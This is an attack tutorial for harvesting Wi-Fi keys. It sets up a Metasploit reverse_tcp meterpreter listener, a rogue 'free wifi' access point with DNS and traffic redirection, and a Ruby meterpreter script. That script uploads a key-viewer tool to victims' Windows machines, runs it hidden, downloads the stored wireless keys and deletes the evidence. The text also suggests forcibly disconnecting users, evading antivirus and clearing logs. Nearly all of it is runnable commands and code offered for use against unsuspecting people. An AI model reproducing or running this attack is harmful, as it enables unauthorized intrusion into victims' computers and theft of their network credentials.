Wireless key harvester First we create our meterpreter exe check this page out http://synjunkie.blogspot.com/2008/10/metasploit-payloads-msfpayload.html setup our listener ./msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 10.0.0.1 set LPORT 55555 set AutoRunScript /home/hm/Desktop/http/wirelesskeyharvester.rb set ExitOnSession false show options exploit -j next setup our fake access point modprobe tun airbase-ng -P -C 30 -e "free wifi" wlan1 -v no we setup our dhcp server ifconfig at0 up ifconfig lo up ifconfig at0 10.0.0.1 netmask 255.255.255.0 ifconfig at0 mtu 1400 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1 iptables -P FORWARD ACCEPT iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1 /etc/init.d/dhcp3-server restart setup apache server to host our exploit /etc/init.d/lighttpd stop lighttpd -D -f '/home/hm/Desktop/http/http' dns redirector -- in this case dnspoison cd dnspoison java ServerKernelMain 10.0.0.1 10.0.0.1 and thats it, wait for victims to connect, or forcefully disconnect them using mdk!!!!!! --------------------------- harvester.rb --------------------------------------- # # Wireless key harvester using wireless key viewer" require 'rex' # Extract the host and port host,port = session.tunnel_peer.split(':') print_status("New session found on #{host}:#{port}...") # bin -- the name of our exe bin = "wkv.exe" # output of wireless key viewer out = Rex::Text.rand_text_alpha_upper(5) + ".txt" #destination for the keys in txt format dest = "/home/hm/Desktop/keys/" #upload wireless key viewer --- modify it to bypass av's print_status("Uploading Wireless Key Viewer") sleep(1) client.fs.file.upload_file("%SystemDrive%\\#{bin}", "/home/hm/Desktop/http/wkv.exe") sleep(1) print_status("Uploaded Wireless Key Viewer") sleep(1) #execute via cmd, output will be random name, print_status("Executing wireless key viewer ") client.sys.process.execute("cmd.exe /c %SystemDrive%\\wkv.exe /stabular /#{out}", nil, {'Hidden' => 'false'}) print_status("bat file executed") sleep(1) #download keys to our keys folder print_status("Downloading keys to keys folder ") client.fs.file.download_file("#{dest}#{out}", "%SystemDrive%\\#{out}") print_status("Downloaded keys to keys folder ") #delete uploaded files -- we can also clear logs here if we want to sleep(1) print_status("Deleting uploaded files ") client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{bin} ", nil, {'Hidden' => 'true'}) client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{out} ", nil, {'Hidden' => 'true'}) print_status("Have a nice day!!!!!! ")